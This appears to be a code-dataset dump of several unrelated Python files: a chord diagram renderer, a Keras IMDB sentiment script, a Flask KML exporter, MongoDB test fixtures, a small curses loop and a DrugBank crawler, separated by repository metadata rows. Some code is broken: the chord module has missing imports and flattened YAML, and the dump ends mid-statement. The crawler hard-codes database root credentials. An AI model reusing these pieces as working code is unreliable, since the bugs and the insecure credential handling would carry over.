import yaml
from .compat import StringIO
from .fretboard import Fretboard
from .utils import dict_merge
CHORD_STYLE = '''
string:
muted_font_color: silver
open_font_color: steelblue
'''
class Chord(object):
    """A fretted chord shape that can be rendered onto a Fretboard SVG."""

    default_style = dict_merge(
        yaml.safe_load(CHORD_STYLE),
        Fretboard.default_style
    )

    inlays = Fretboard.inlays
    strings = 6

    def __init__(self, positions=None, fingers=None, style=None):
        """
        positions: one fret per string, e.g. 'xx0232', or '-'-separated
                   ('10-12-12-10-10-10') when any fret has two digits;
                   non-digit characters mean the string is not fretted
        fingers: one finger label per string (digits; anything else = none)
        style: style overrides merged over default_style
        """
        if positions is None:
            positions = []
        elif '-' in positions:
            positions = positions.split('-')
        else:
            positions = list(positions)
        self.positions = list(map(lambda p: int(p) if p.isdigit() else None, positions))

        self.fingers = list(fingers) if fingers else []

        self.style = attrdict.AttrDict(
            dict_merge(
                copy.deepcopy(self.default_style),
                style or {}
            )
        )

    def get_barre_fret(self):
        """Return the fret barred by one finger over several strings, or None."""
        for index, finger in enumerate(self.fingers):
            if finger.isdigit() and self.fingers.count(finger) > 1:
                return int(self.positions[index])

    def get_fret_range(self):
        """Return the (first, last) five-fret window showing all positions."""
        fretted_positions = list(filter(lambda pos: isinstance(pos, int), self.positions))
        if not fretted_positions:
            # robustness fix: nothing fretted (all muted/unspecified) used
            # to crash on max([]); show the nut area instead
            return (0, 4)
        if max(fretted_positions) < 5:
            first_fret = 0
        else:
            first_fret = min(filter(lambda pos: pos != 0, fretted_positions))
        return (first_fret, first_fret + 4)

    def draw(self):
        """Build the Fretboard and place all markers and string labels."""
        self.fretboard = Fretboard(
            strings=self.strings,
            frets=self.get_fret_range(),
            inlays=self.inlays,
            style=self.style
        )

        # Check for a barred fret (we'll need to know this later)
        barre_fret = None
        for index, finger in enumerate(self.fingers):
            if finger.isdigit() and self.fingers.count(finger) > 1:
                barre_fret = self.positions[index]
                barre_start = index
                barre_end = len(self.fingers) - self.fingers[::-1].index(finger) - 1
                break

        if barre_fret is not None:
            self.fretboard.add_marker(
                string=(barre_start, barre_end),
                fret=barre_fret,
                label=finger,
            )

        for string in range(self.strings):
            # Get the position and fingering
            try:
                fret = self.positions[string]
            except IndexError:
                # bug fix: the original assigned `pos = None` here, leaving
                # `fret` unbound and raising NameError below
                fret = None

            # Determine if the string is muted or open
            is_muted = False
            is_open = False

            if fret == 0:
                is_open = True
            elif fret is None:
                is_muted = True

            if is_muted or is_open:
                self.fretboard.add_string_label(
                    string=string,
                    label='X' if is_muted else 'O',
                    font_color=self.style.string.muted_font_color if is_muted else self.style.string.open_font_color
                )
            elif fret is not None and fret != barre_fret:
                # Add the fret marker
                try:
                    finger = self.fingers[string]
                except IndexError:
                    finger = None

                self.fretboard.add_marker(
                    string=string,
                    fret=fret,
                    label=finger,
                )

    def render(self, output=None):
        """Draw the chord and write the SVG to *output* (default: StringIO)."""
        self.draw()

        if output is None:
            output = StringIO()

        self.fretboard.render(output)
        return output

    def save(self, filename):
        """Render the chord SVG straight into *filename*."""
        with open(filename, 'w') as output:
            self.render(output)
class BassChord(Chord):
    # 4-string bass variant: identical drawing logic, fewer strings.
    strings = 4
class UkuleleChord(Chord):
    # 4-string ukulele variant; ukulele fretboards typically mark inlays at
    # frets 3, 5, 7 and 10 instead of the guitar's 3/5/7/9.
    strings = 4
    inlays = (3, 5, 7, 10)
| 27.877698 | 116 | 0.543742 | 3,624 | 0.935226 | 0 | 0 | 0 | 0 | 0 | 0 | 242 | 0.062452 |
805364bb7db976a9ae2d3096d0339f8997426097 | 2,610 | py | Python | cheatsheets/py/pyython.6a.keras.py | questsin/cheats | e8bfe3d206a240e29ded7b199113437f4aa42544 | [
"Apache-2.0"
] | null | null | null | cheatsheets/py/pyython.6a.keras.py | questsin/cheats | e8bfe3d206a240e29ded7b199113437f4aa42544 | [
"Apache-2.0"
] | 3 | 2021-03-19T11:26:35.000Z | 2021-09-08T01:43:48.000Z | cheatsheets/py/pyython.6a.keras.py | questsin/cheats | e8bfe3d206a240e29ded7b199113437f4aa42544 | [
"Apache-2.0"
] | null | null | null | from keras.datasets import imdb
# Train a small dense sentiment classifier on the Keras IMDB dataset and
# plot training/validation accuracy per epoch.

# Keep only the 10,000 most frequent words; everything rarer becomes the
# "unknown" token when reviews are encoded.
top_words = 10000
(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=top_words)

# Build the word -> index mapping.  Indices 0-2 are reserved by the Keras
# IMDB encoding (padding / start-of-review / unknown), so every real word
# index is shifted up by 3 to match the encoded reviews.
word_dict = imdb.get_word_index()
word_dict = {key: (value + 3) for key, value in word_dict.items()}
word_dict[''] = 0   # Padding
word_dict['>'] = 1  # Start
word_dict['?'] = 2  # Unknown word
reverse_word_dict = {value: key for key, value in word_dict.items()}
# Sanity check: decode the first training review back to readable text.
# (renamed loop variable: `id` shadowed the builtin)
print(' '.join(reverse_word_dict[token_id] for token_id in x_train[0]))

from keras.preprocessing import sequence

# Pad/truncate every review to a fixed length of 500 tokens.
max_review_length = 500
x_train = sequence.pad_sequences(x_train, maxlen=max_review_length)
x_test = sequence.pad_sequences(x_test, maxlen=max_review_length)

from keras.models import Sequential
from keras.layers import Dense
from keras.layers.embeddings import Embedding
from keras.layers import Flatten

# Embedding -> Flatten -> two hidden ReLU layers -> sigmoid output.
embedding_vector_length = 32
model = Sequential()
model.add(Embedding(top_words, embedding_vector_length, input_length=max_review_length))
model.add(Flatten())
model.add(Dense(16, activation='relu'))
model.add(Dense(16, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy',optimizer='adam', metrics=['accuracy'])
print(model.summary())

hist = model.fit(x_train, y_train, validation_data=(x_test, y_test), epochs=5, batch_size=128)

import seaborn as sns
import matplotlib.pyplot as plt
# %matplotlib inline
# BUG FIX: the line above is an IPython magic and a SyntaxError in a plain
# .py file; it is kept as a comment for notebook use.
sns.set()

# Plot training vs. validation accuracy over the epochs.
acc = hist.history['acc']
val = hist.history['val_acc']
epochs = range(1, len(acc) + 1)

plt.plot(epochs, acc, '-', label='Training accuracy')
plt.plot(epochs, val, ':', label='Validation accuracy')
plt.title('Training and Validation Accuracy')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.legend(loc='upper left')
plt.plot()

scores = model.evaluate(x_test, y_test, verbose=0)
print("Accuracy: %.2f%%" % (scores[1] * 100))
import string
import numpy as np
def analyze(text):
    """Return the model's sentiment score in [0, 1] for a raw review string.

    Relies on the module-level `word_dict`, `top_words`, `max_review_length`,
    `sequence` and `model` globals defined above.
    """
    # Prepare the input by removing punctuation characters, converting
    # characters to lower case, and removing words containing numbers
    translator = str.maketrans('', '', string.punctuation)
    text = text.translate(translator)
    text = text.lower().split(' ')
    text = [word for word in text if word.isalpha()]

    # Generate an input tensor: 1 is the start token, 2 the unknown token.
    # (renamed from `input`, which shadowed the builtin)
    encoded = [1]
    for word in text:
        if word in word_dict and word_dict[word] < top_words:
            encoded.append(word_dict[word])
        else:
            encoded.append(2)

    padded_input = sequence.pad_sequences([encoded], maxlen=max_review_length)

    # Invoke the model and return the result.
    # Simplification: `np.array([padded_input][0])` was a no-op wrapper --
    # pad_sequences already returns an ndarray.
    result = model.predict(padded_input)[0][0]
    return result
8053775f8d98b076220bbf63085b0a13451f988a | 2,145 | py | Python | Analytics/resources/moving_sensors/export_to_kml.py | thanosbnt/SharingCitiesDashboard | 5d123691d1f25d0b85e20e4e8293266bf23c9f8a | [
"Apache-2.0"
] | 4 | 2018-11-21T14:42:18.000Z | 2020-05-11T10:52:59.000Z | Analytics/resources/moving_sensors/export_to_kml.py | thanosbnt/SharingCitiesDashboard | 5d123691d1f25d0b85e20e4e8293266bf23c9f8a | [
"Apache-2.0"
] | 60 | 2018-11-21T15:11:59.000Z | 2019-12-02T10:46:44.000Z | Analytics/resources/moving_sensors/export_to_kml.py | thanosbnt/SharingCitiesDashboard | 5d123691d1f25d0b85e20e4e8293266bf23c9f8a | [
"Apache-2.0"
] | 7 | 2018-11-21T14:42:44.000Z | 2019-11-28T16:24:14.000Z | from http import HTTPStatus
import simplekml
from flask_jwt_extended import jwt_required
from flask_restful import Resource
from flask_restful import reqparse
from models.pin_location_data import Tracker
class ExportToKML(Resource):
    """REST resource that exports a tracker's stored locations to a KML file."""
    def __init__(self) -> None:
        """Declare the query arguments accepted by GET."""
        self.reqparser = reqparse.RequestParser()
        self.reqparser.add_argument('tracker_id', required=True, type=str)
        self.reqparser.add_argument('start_date', required=False,
                                    store_missing=False, type=str)
        self.reqparser.add_argument('end_date', required=False,
                                    store_missing=False, type=str)
    @jwt_required
    def get(self) -> ({str: str}, HTTPStatus):
        """Write the tracker's location history to <tracker_id>.kml.

        Returns a JSON payload with the created file name and
        HTTPStatus.CREATED on success, a NOT_FOUND error when the tracker
        is unknown, or INTERNAL_SERVER_ERROR when the file cannot be
        written.
        """
        args = self.reqparser.parse_args()
        tracker = Tracker.get_by_tracker_id(args["tracker_id"])
        if not tracker:
            return {"error": "tracker with id {} not found".format(
                args["tracker_id"])}, HTTPStatus.NOT_FOUND
        document = simplekml.Kml()
        line = document.newlinestring(name="{}".format(tracker.id),
                                      description="",
                                      coords=tracker.kml_coords)
        line.style.linestyle.color = 'AA66CCff'  # Red
        line.style.linestyle.width = 3  # 10 pixels
        try:
            document.save('{}.kml'.format(tracker.id))
        except IOError as ioe:
            return {"error": "Unable to create KML file",
                    "traceback": ioe.with_traceback(ioe.__traceback__)}, \
                   HTTPStatus.INTERNAL_SERVER_ERROR
        return {"file_name": args["tracker_id"] + ".kml"}, HTTPStatus.CREATED
80559713ec52ee98cc95d60ae305cc0f76247d7f | 4,658 | py | Python | graphene_mongo/tests/conftest.py | pfrantz/graphene-mongo | f7d4f3e194ec41793e6da547934c34e11fd9ef51 | [
"MIT"
] | null | null | null | graphene_mongo/tests/conftest.py | pfrantz/graphene-mongo | f7d4f3e194ec41793e6da547934c34e11fd9ef51 | [
"MIT"
] | null | null | null | graphene_mongo/tests/conftest.py | pfrantz/graphene-mongo | f7d4f3e194ec41793e6da547934c34e11fd9ef51 | [
"MIT"
] | null | null | null | import os
import pytest
from datetime import datetime
from .models import (
Article,
Editor,
EmbeddedArticle,
Player,
Reporter,
Child,
ProfessorMetadata,
ProfessorVector,
ChildRegisteredBefore,
ChildRegisteredAfter,
ParentWithRelationship,
CellTower,
Publisher,
)
current_dirname = os.path.dirname(os.path.abspath(__file__))
@pytest.fixture()
def fixtures_dirname():
    """Absolute path of the fixtures directory that sits beside this module."""
    fixtures_path = os.path.join(current_dirname, "fixtures")
    return fixtures_path
@pytest.fixture(scope="module")
def fixtures():
    """Populate the test MongoDB with a linked graph of sample documents.

    Drops and rebuilds publishers, editors, articles, reporters, players,
    children, cell towers, professor vectors and parent/child relationship
    documents, then returns True so the fixture can be required by tests.
    """
    # --- Publisher / editors (editor1 also gets a GridFS avatar) ---
    Publisher.drop_collection()
    publisher1 = Publisher(name="Newsco")
    publisher1.save()
    Editor.drop_collection()
    editor1 = Editor(
        id="1",
        first_name="Penny",
        last_name="Hardaway",
        metadata={"age": "20", "nickname": "$1"},
        company=publisher1,
    )
    image_filename = os.path.join(current_dirname, "fixtures", "image.jpg")
    with open(image_filename, "rb") as f:
        editor1.avatar.put(f, content_type="image/jpeg")
    editor1.save()
    editor2 = Editor(id="2", first_name="Grant", last_name="Hill")
    editor2.save()
    editor3 = Editor(id="3", first_name="Dennis", last_name="Rodman")
    editor3.save()
    # --- Articles referencing the editors ---
    Article.drop_collection()
    pub_date = datetime.strptime("2020-01-01", "%Y-%m-%d")
    article1 = Article(headline="Hello", editor=editor1, pub_date=pub_date)
    article1.save()
    article2 = Article(headline="World", editor=editor2, pub_date=pub_date)
    article2.save()
    article3 = Article(headline="Bye", editor=editor2, pub_date=pub_date)
    article3.save()
    # --- Reporter with embedded and generic references ---
    Reporter.drop_collection()
    reporter1 = Reporter(
        id="1",
        first_name="Allen",
        last_name="Iverson",
        email="ai@gmail.com",
        awards=["2010-mvp"],
        generic_references=[article1]
    )
    reporter1.articles = [article1, article2]
    embedded_article1 = EmbeddedArticle(headline="Real", editor=editor1)
    embedded_article2 = EmbeddedArticle(headline="World", editor=editor2)
    reporter1.embedded_articles = [embedded_article1, embedded_article2]
    reporter1.embedded_list_articles = [embedded_article2, embedded_article1]
    reporter1.generic_reference = article1
    reporter1.save()
    # --- Players with mutual (circular) references ---
    Player.drop_collection()
    player1 = Player(
        first_name="Michael",
        last_name="Jordan",
        articles=[article1, article2])
    player1.save()
    player2 = Player(
        first_name="Magic",
        last_name="Johnson",
        opponent=player1,
        articles=[article3])
    player2.save()
    player3 = Player(first_name="Larry", last_name="Bird", players=[player1, player2])
    player3.save()
    player1.players = [player2]
    player1.save()
    player2.players = [player1]
    player2.save()
    player4 = Player(first_name="Chris", last_name="Webber")
    player4.save()
    # --- Simple child documents, one with a geo point ---
    Child.drop_collection()
    child1 = Child(bar="BAR", baz="BAZ")
    child1.save()
    child2 = Child(bar="bar", baz="baz", loc=[10, 20])
    child2.save()
    # --- Cell tower with polygon/multipolygon geo fields ---
    CellTower.drop_collection()
    ct = CellTower(
        code="bar",
        base=[
            [
                [-43.36556, -22.99669],
                [-43.36539, -23.01928],
                [-43.26583, -23.01802],
                [-43.36717, -22.98855],
                [-43.36636, -22.99351],
                [-43.36556, -22.99669],
            ]
        ],
        coverage_area=[
            [
                [
                    [-43.36556, -22.99669],
                    [-43.36539, -23.01928],
                    [-43.26583, -23.01802],
                    [-43.36717, -22.98855],
                    [-43.36636, -22.99351],
                    [-43.36556, -22.99669],
                ]
            ]
        ],
    )
    ct.save()
    # --- Professor vector with embedded metadata ---
    ProfessorVector.drop_collection()
    professor_metadata = ProfessorMetadata(
        id="5e06aa20-6805-4eef-a144-5615dedbe32b",
        first_name="Steven",
        last_name="Curry",
        departments=["NBA", "MLB"],
    )
    professor_vector = ProfessorVector(vec=[1.0, 2.3], metadata=professor_metadata)
    professor_vector.save()
    # --- Parent/child docs registered before and after the parent class ---
    ParentWithRelationship.drop_collection()
    ChildRegisteredAfter.drop_collection()
    ChildRegisteredBefore.drop_collection()
    # This is one messed up family
    # She'd better have presence this time
    child3 = ChildRegisteredBefore(name="Akari")
    child4 = ChildRegisteredAfter(name="Kyouko")
    child3.save()
    child4.save()
    parent = ParentWithRelationship(
        name="Yui", before_child=[child3], after_child=[child4]
    )
    parent.save()
    child3.parent = child4.parent = parent
    child3.save()
    child4.save()
    return True
| 27.4 | 86 | 0.608201 | 0 | 0 | 0 | 0 | 4,273 | 0.917347 | 0 | 0 | 475 | 0.101975 |
80561b7e18a127e210a8a735291399c3216ea532 | 471 | py | Python | scratch.py | chappers/lightning-rl | 3c4ec35db983f256fc1ee82c9cab8ed8725bc58b | [
"MIT"
] | null | null | null | scratch.py | chappers/lightning-rl | 3c4ec35db983f256fc1ee82c9cab8ed8725bc58b | [
"MIT"
] | null | null | null | scratch.py | chappers/lightning-rl | 3c4ec35db983f256fc1ee82c9cab8ed8725bc58b | [
"MIT"
] | null | null | null | import curses
# Minimal curses input loop: echo the last pressed key, or "Waiting" when
# the half-delay timeout expires.
scr = curses.initscr()
curses.halfdelay(5)  # How many tenths of a second are waited, from 1 to 255
curses.noecho()      # Wont print the input
try:
    while True:
        char = scr.getch()  # Blocks until the delay elapses or a key arrives
        scr.clear()  # Clears the screen
        if char != curses.ERR:  # True if the user pressed something
            scr.addstr(0, 0, chr(char))
        else:
            scr.addstr(0, 0, "Waiting")
finally:
    # BUG FIX: restore the terminal (echo, line buffering, cursor) even when
    # the loop is interrupted with Ctrl-C; previously any exit left the
    # shell in a broken state.
    curses.endwin()
| 33.642857 | 76 | 0.658174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 231 | 0.490446 |
805782c90511b1092705178abcf7d9ba97014167 | 669 | py | Python | src/thenewboston/factories/network_validator.py | achalpatel/thenewboston-python | 4044ce07cb5e0d1f92b4332bbd8c6ac8f33bcdb9 | [
"MIT"
] | 122 | 2020-07-12T23:08:49.000Z | 2021-12-18T16:14:10.000Z | src/thenewboston/factories/network_validator.py | achalpatel/thenewboston-python | 4044ce07cb5e0d1f92b4332bbd8c6ac8f33bcdb9 | [
"MIT"
] | 47 | 2020-07-15T02:18:09.000Z | 2021-09-22T19:51:59.000Z | src/thenewboston/factories/network_validator.py | achalpatel/thenewboston-python | 4044ce07cb5e0d1f92b4332bbd8c6ac8f33bcdb9 | [
"MIT"
] | 52 | 2020-07-13T10:49:52.000Z | 2021-10-30T03:34:55.000Z | from factory import Faker
from .network_node import NetworkNodeFactory
from ..constants.network import ACCOUNT_FILE_HASH_LENGTH, BLOCK_IDENTIFIER_LENGTH, MAX_POINT_VALUE, MIN_POINT_VALUE
from ..models.network_validator import NetworkValidator
class NetworkValidatorFactory(NetworkNodeFactory):
    # Factory for validator test objects; extends the base network-node
    # factory with validator-specific fields.
    # Random confirmation rate bounded by the network's point-value limits.
    daily_confirmation_rate = Faker('pyint', max_value=MAX_POINT_VALUE, min_value=MIN_POINT_VALUE)
    # URL of the validator's root account file plus fixed-length hash and
    # seed-block identifier strings.
    root_account_file = Faker('url')
    root_account_file_hash = Faker('text', max_nb_chars=ACCOUNT_FILE_HASH_LENGTH)
    seed_block_identifier = Faker('text', max_nb_chars=BLOCK_IDENTIFIER_LENGTH)
    class Meta:
        # Abstract: meant to be subclassed, not used to create objects directly.
        model = NetworkValidator
        abstract = True
| 39.352941 | 115 | 0.807175 | 422 | 0.630792 | 0 | 0 | 0 | 0 | 0 | 0 | 24 | 0.035874 |
80581742c4e9dd6b7cf6b2c14279d454b5d3049b | 365 | py | Python | core/facade.py | vitorpvcampos/djmenu | 49f9984007c94474b50122d81727a96b9c6c56c3 | [
"MIT"
] | 10 | 2020-06-02T16:23:15.000Z | 2021-05-25T16:17:19.000Z | core/facade.py | vitorpvcampos/djmenu | 49f9984007c94474b50122d81727a96b9c6c56c3 | [
"MIT"
] | 241 | 2019-11-18T14:57:29.000Z | 2022-03-18T16:09:38.000Z | core/facade.py | vitorpvcampos/djmenu | 49f9984007c94474b50122d81727a96b9c6c56c3 | [
"MIT"
] | 3 | 2020-03-12T15:08:04.000Z | 2020-06-22T19:50:16.000Z | from menu.models import Menu
from products.models import Product, Category
def get_dashboard_data_summary():
    """Return totals of menus, products and categories for the dashboard.

    Performance fix: uses QuerySet.count() so the database runs COUNT(*)
    queries instead of fetching every row only to call len() on it.
    """
    return {'total_cardapios': Menu.objects.count(),
            'total_produtos': Product.objects.count(),
            'total_categorias': Category.objects.count()}
| 28.076923 | 48 | 0.69863 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 51 | 0.139726 |
8058a85467ead4f2df3d7aeae90f5f3cb7569943 | 9,954 | py | Python | database/crawler/crawl_drugbank.py | tttor/csipb-jamu-prj | 33b08a8a12054c8a5a7240681a28c8b233b329ba | [
"MIT"
] | 5 | 2017-03-31T03:25:09.000Z | 2021-12-17T02:28:24.000Z | database/crawler/crawl_drugbank.py | tttor/csipb-jamu-prj | 33b08a8a12054c8a5a7240681a28c8b233b329ba | [
"MIT"
] | 165 | 2016-08-11T01:59:47.000Z | 2017-10-10T06:32:12.000Z | database/crawler/crawl_drugbank.py | tttor/csipb-jamu-prj | 33b08a8a12054c8a5a7240681a28c8b233b329ba | [
"MIT"
] | 11 | 2015-06-15T04:25:59.000Z | 2021-04-18T09:39:16.000Z | # crawl_drugbank.py
import time
import pickle
import json
import MySQLdb
import httplib
import urllib2 as urllib
from collections import defaultdict
import dbcrawler_util as util
from datetime import datetime
from bs4 import BeautifulSoup as bs
# Output directory for the crawled/parsed DrugBank dumps.
outDir = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002'
# Module-level MySQL connection, opened at import time.
# NOTE(review): credentials are hard-coded in source; move to config.
db = MySQLdb.connect("localhost","root","123","ijah" )
cursor = db.cursor()
def main():
    """Crawler entry point: enable a stage by un-commenting it below."""
    #########
    # drugProteinDict = parseUniprotlinkFile() # contain drug-protein binding info
    # drugbankIdList = drugProteinDict.keys()
    # drugbankIdList = ['DB01627','DB05101','DB05107','DB08423','DB05127']
    # drugData = parseDrugWebpage(drugbankIdList)
    # drugData = parseSmiles(drugbankIdList)
    # fixDrugData()
    # BUG FIX: a def whose suite contains only comments is a SyntaxError,
    # so the module could not even be imported; `pass` makes it valid.
    pass
def fixDrugData():
    """Repair a previously scraped drug-data pickle (Python 2 code).

    Replaces SMILES entries (and any other field) that contain HTML
    scraping artifacts with values from the separately crawled SMILES
    pickle, then re-saves the fixed dict as .pkl and .json.
    """
    # Substrings that mark a field as scraping residue rather than real data.
    badWords = ['email','class="wrap"','.smiles','href']
    old = None
    smilesDict = None
    fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_drug_data_2016-10-05_10:16:42.860649.ori.pkl'
    with open(fpath, 'rb') as handle:
        old = pickle.load(handle)
    fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_drug_smiles_2016-10-05_12:35:37.724557.pkl'
    with open(fpath, 'rb') as handle:
        smilesDict = pickle.load(handle)
    nOld = len(old)
    # NOTE(review): `new = old` aliases the same dict, so entries are fixed
    # in place rather than copied.
    new = old
    idx = 0
    for k,v in old.iteritems():
        idx += 1
        print 'fixing', k, 'idx=', str(idx), 'of', nOld
        if 'SMILES' in v.keys():
            oldSmiles = v['SMILES']
            bad = False
            for b in badWords:
                if b in oldSmiles:
                    bad = True
                    break
            if bad:
                new[k]['SMILES'] = smilesDict[k]
        else:
            # SMILES missing entirely: take it from the dedicated SMILES crawl.
            new[k]['SMILES'] = smilesDict[k]
        # Any other field containing an artifact is blanked out.
        for k2,v2 in v.iteritems():
            for b in badWords:
                if b in v2:
                    new[k][k2] = 'not-available'
    assert(len(old)==len(new))
    fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_drug_data_2016-10-05_10:16:42.860649.pkl'
    with open(fpath, 'wb') as f:
        pickle.dump(new, f)
    fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_drug_data_2016-10-05_10:16:42.860649.json'
    with open(fpath, 'w') as f:
        json.dump(new, f, indent=2, sort_keys=True)
def parseUniprotlinkFile():
    """Parse DrugBank's uniprot_links.csv into {drugbankId: {name, targetProtein[]}}.

    Quoted CSV fields may contain commas; those commas are temporarily
    replaced with '$' so a plain split(',') works, then restored.  The
    result is dumped to timestamped .json and .pkl files and returned.
    (Python 2 code.)
    """
    dpFpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/uniprot_links.csv'
    now = datetime.now()
    drugProteinDict = dict()
    idx = 0
    with open(dpFpath) as infile:
        first = True
        hot = ''
        for line in infile:
            if not(first):
                idx += 1
                print 'parsing idx=', idx
                line = line.strip();
                # Positions of opening quotes only (pairs are assumed balanced).
                quoteIdx = [i for i,c in enumerate(line) if c=='"']; assert(len(quoteIdx)%2==0)
                quoteIdx = [j for i,j in enumerate(quoteIdx) if i%2==0] # take only odd-indexed idx
                words = line.split('"')
                words2 = []
                for w in words:
                    i = line.find(w) # just after an opening quote
                    w2 = w
                    if (i-1) in quoteIdx:
                        # Inside quotes: protect embedded commas.
                        w2 = w.replace(',','$')
                    if len(w2)!=0:
                        words2.append(w2)
                line = ' '.join(words2)
                words = line.split(',');
                words = words[0:4]
                words = [w.strip() for w in words]
                words = [w.replace('$',',') for w in words]
                drugbankId = words[0]
                name = words[1]
                uniprotId = words[3]
                # Rows are grouped by drug id; start a new entry on change.
                if hot != drugbankId:
                    hot = drugbankId
                    drugProteinDict[hot] = defaultdict(list)
                if len(drugProteinDict[hot]['name'])==0:
                    drugProteinDict[hot]['name'] = name
                drugProteinDict[hot]['targetProtein'].append(uniprotId)
            first = False
    jsonFpath = outDir+'/drugbank_drug_vs_protein_'+str(now.date())+'_'+str(now.time())+'.json'
    with open(jsonFpath, 'w') as f:
        json.dump(drugProteinDict, f, indent=2, sort_keys=True)
    pklFpath = outDir+'/drugbank_drug_vs_protein_'+str(now.date())+'_'+str(now.time())+'.pkl'
    with open(pklFpath, 'wb') as f:
        pickle.dump(drugProteinDict, f)
    return drugProteinDict
def parseDrugWebpage(drugbankIdList): # e.g. http://www.drugbank.ca/drugs/DB05107
    """Scrape per-drug pages from drugbank.ca for identifiers and targets.

    For each DrugBank id, fetches the drug page, extracts InChI Key / CAS /
    formula / SMILES from table rows plus PubChem, ChemSpider and UniProt
    ids from links, and checkpoints results to .json/.pkl every 100 drugs
    and at the end.  (Python 2 code; network-bound.)
    """
    html = None
    comData = dict()
    now = datetime.now()
    nDbId = len(drugbankIdList)
    for idx, dbId in enumerate(drugbankIdList):
        print 'parsing', dbId, 'idx=', str(idx+1), 'of', str(nDbId)
        baseURL = 'http://www.drugbank.ca/drugs/'
        url = baseURL+dbId
        html = urllib.urlopen(url)
        # baseFpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/'
        # fpath = baseFpath+dbId+ '.html'
        # with open(fpath, 'r') as content_file:
        #     html = content_file.read()
        #
        soup = bs(html, 'html.parser')
        #
        datum = defaultdict(list)
        # datum['name'] = str(soup.title.string).split()[1].strip()
        trList = soup.find_all('tr')
        for tr in trList:
            trStr = str(tr)
            keys = ['InChI Key','CAS number','Chemical Formula','SMILES']
            for k in keys:
                # Skip rows that are links or wrapped markup artifacts.
                if (k in trStr)and('.smiles' not in trStr)and('class="wrap"' not in trStr)and('href' not in trStr):
                    trStr = trStr.split('<td>')[1].replace('</td></tr>','')
                    trStr = trStr.replace('InChIKey=','')
                    trStr = trStr.replace('<div class="wrap">','').replace('</div>','')
                    trStr = trStr.replace('<sub>','').replace('</sub>','')
                    if ('wishart-not-available' in trStr) or trStr=='':
                        trStr = 'not-available'
                    # print trStr
                    datum[k] = trStr
        aList = soup.find_all('a')
        cidBaseUrl = 'http://pubchem.ncbi.nlm.nih.gov/summary/summary.cgi?cid='
        sidBaseUrl = 'http://pubchem.ncbi.nlm.nih.gov/summary/summary.cgi?sid='
        chemspiderBaseUrl = 'http://www.chemspider.com/Chemical-Structure.'
        uniprotBaseUrl = 'http://www.uniprot.org/uniprot/'
        # NOTE(review): str.strip(prefix) strips a *character set*, not a
        # prefix string; it works here only because the ids are numeric /
        # disjoint from the URL characters.  str.replace(base, '') would be
        # the robust form.
        for a in aList:
            href = str(a.get('href'))
            if cidBaseUrl in href:
                datum['pubchemCid']= str(a.get('href').strip(cidBaseUrl))
            elif sidBaseUrl in href:
                datum['pubchemSid']= str(a.get('href').strip(sidBaseUrl))
            elif chemspiderBaseUrl in href:
                datum['chemspiderId'] = str(a.get('href').strip(chemspiderBaseUrl).strip('.html'))
            elif uniprotBaseUrl in href:
                datum['uniprotTargets'].append( str(a.get('href').strip(uniprotBaseUrl)) )
        comData[dbId] = datum
        # Periodic checkpoint so a crash does not lose the whole crawl.
        if ((idx+1)%100)==0 or idx==(nDbId-1):
            jsonFpath = outDir+'/drugbank_drug_data_'+str(now.date())+'_'+str(now.time())+'.json'
            with open(jsonFpath, 'w') as f:
                json.dump(comData, f, indent=2, sort_keys=True)
            pklFpath = outDir+'/drugbank_drug_data_'+str(now.date())+'_'+str(now.time())+'.pkl'
            with open(pklFpath, 'wb') as f:
                pickle.dump(comData, f)
    return comData
def parseSmiles(drugbankIdList):
    """Fetch the .smiles text for each DrugBank id from drugbank.ca.

    Network errors fall back to the 'not-available' placeholder; results
    are checkpointed to .json/.pkl every 100 ids and at the end, and the
    {drugbankId: smiles} dict is returned.  (Python 2 code.)
    """
    now = datetime.now()
    nDbId = len(drugbankIdList)
    baseURL = 'http://www.drugbank.ca/structures/structures/small_molecule_drugs/'
    smiles = dict()
    for idx, dbId in enumerate(drugbankIdList):
        print 'parsing', dbId, 'idx=', str(idx+1), 'of', str(nDbId)
        s = 'not-available'
        url = baseURL+dbId+'.smiles'
        try:
            s = urllib.urlopen(url)
        except urllib.HTTPError, e:
            print('HTTPError = ' + str(e.code))
        except urllib.URLError, e:
            print('URLError = ' + str(e.reason))
        except httplib.HTTPException, e:
            print('HTTPException')
        except Exception:
            import traceback
            print('generic exception: ' + traceback.format_exc())
        # Parse whatever was fetched (or the placeholder string) to text.
        s = bs(s, 'html.parser')
        smiles[dbId] = str(s)
        # Periodic checkpoint so a crash does not lose the whole crawl.
        if ((idx+1)%100)==0 or idx==(nDbId-1):
            jsonFpath = outDir+'/drugbank_drug_smiles_'+str(now.date())+'_'+str(now.time())+'.json'
            with open(jsonFpath, 'w') as f:
                json.dump(smiles, f, indent=2, sort_keys=True)
            pklFpath = outDir+'/drugbank_drug_smiles_'+str(now.date())+'_'+str(now.time())+'.pkl'
            with open(pklFpath, 'wb') as f:
                pickle.dump(smiles, f)
    # print smiles
    return smiles
# def parseDrugbankVocab():
# fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_vocabulary.csv'
# with open(fpath) as infile:
# first = True
# idx = 0
# for line in infile:
# if not(first):
# idx += 1
# print 'updating idx=', idx
# line = line.strip()
# words = line.split(',')
# words = words[0:4]
# drugbankId = words[0]
# cas = words[3]
# cas = cas.replace('"','')
# if len(cas)!=0 and len(drugbankId)!=0:
# drugbankId = '"'+drugbankId+'"'
# cas = '"'+cas+'"'
# qf = 'UPDATE compound SET '
# qm = 'com_cas_id='+cas
# qr = ' WHERE com_drugbank_id='+drugbankId
# q = qf+qm+qr
# # print q
# util.mysqlCommit(db, cursor, q)
# first = False
# Script entry point: run main() and report total wall-clock time.
if __name__ == '__main__':
